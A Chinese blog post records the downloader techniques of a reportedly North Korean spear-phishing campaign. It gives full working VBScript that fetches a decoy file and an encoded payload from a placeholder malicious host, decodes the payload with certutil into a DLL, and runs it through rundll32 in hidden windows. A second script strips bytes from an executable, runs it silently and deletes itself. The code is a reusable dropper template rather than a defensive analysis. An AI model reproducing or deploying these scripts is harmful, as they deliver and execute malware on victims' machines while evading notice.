zoukankan      html  css  js  c++  java

  • 利用VBS下载EXE文件手法记录

    1、信息来源

    疑似朝鲜通过鱼叉攻击韩国统一部记者的APT事件整理

    https://mp.weixin.qq.com/s/4IFV31MBNbANnCVaJj7ZPQ

    https://twitter.com/blackorbird/status/1082553543280680962

    2、利用思路

    1、 下载http://恶意网址/note[.]png作为文件到%temp%路径下,通过【powershell Invoke-item】运行。
    2、 下载http://恶意网址/svchow.dat改名为svchow[.]dat
    3、 certutil -f –decode 强制覆盖文件、base64解码改名为dll
    4、 通过powershell运行rundl32加载svchow.dll中的MyRTLCreateFunction函数运行恶意代码。

    3、实例代码

    下载代码:

    Set wshShell = CreateObject("Wscript.shell")
dir = wshShell.ExpandEnvironmentStrings("%TEMP%")
docUrl = "http://恶意网址/note.png"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", docUrl, False
xHttp.Send
docPath = dir + "
ote.png"
with bStrm
	.type = 1 '//binary
	.open
	.write xHttp.responseBody
	.savetofile docPath, 2 '//overwrite
end With

CreateObject("Wscript.shell").Run "powershell Invoke-item '" + dir + "
ote.png'", 0, true

docUrl = "http://恶意网址/svchow.dat"
dim xHttp2: Set xHttp2 = createobject("Microsoft.XMLHTTP")
dim bStrm2: Set bStrm2 = createobject("Adodb.Stream")
xHttp2.Open "GET", docUrl, False
xHttp2.Send

with bStrm2
	.type = 1 '//binary
	.open
	.write xHttp2.responseBody
	.savetofile dir + "svchow.dat", 2 '//overwrite
end With
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden certutil -f -decode " & dir & "svchow.dat, " & dir & "svchow.dll",0,true
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden cmd /c rundll32 " & dir & "svchow.dll,MyRTLCreateFunction",0,true

    转码运行exe:

    Dim fIn, fOut, sFilename, sBOM
sFilename = "C:windows	empxxx.exe"

Set fIn = CreateObject("adodb.stream")
fIn.Type = 1 'adTypeBinary
fIn.Mode = adModeRead
fIn.Open
fIn.LoadFromFile sFilename

sBOM = fIn.Read(5)
' UTF8 BOM is 0xEF,0xBB,0xBF (decimal 239, 187, 191)
If AscB(MidB(sBOM, 1, 1)) = 255 _
        And AscB(MidB(sBOM, 2, 1)) = 254 Then
    
    fIn.Position = 2 ' Skip BOM

    Set fOut = CreateObject("adodb.stream")
    fOut.Type = 1 'adTypeBinary
    fOut.Mode = adModeReadWrite
    fOut.Open

    fIn.CopyTo fOut

    fOut.SaveToFile sFilename, 2 'adSaveCreateOverwrite
    fOut.Flush
    fOut.Close

	Set shell = CreateObject("Wscript.Shell")
	shell.Run "c:windows	empxxx.exe",0,False
	
	Set fso = CreateObject("Scripting.FileSystemObject") 
	fso.DeleteFile(WScript.ScriptName) 
End If
  • 相关阅读:
    Python成长之路第一篇(4)_if,for,while条件语句
    Python成长之路第一篇(2)__初识列表和元组
    Python练习_更改配置文件(3)
    python练习_购物车(2)
    vue element ui 在父组件中控制子组件表单验证
    mysql find_in_set
    webstorm vuecli4 支持别名
    axios 长数字精度丢失问题
    vue element使用注意
    vue cli 查看webpack的配置
  • 原文地址:https://www.cnblogs.com/17bdw/p/10181580.html
Copyright © 2011-2022 走看看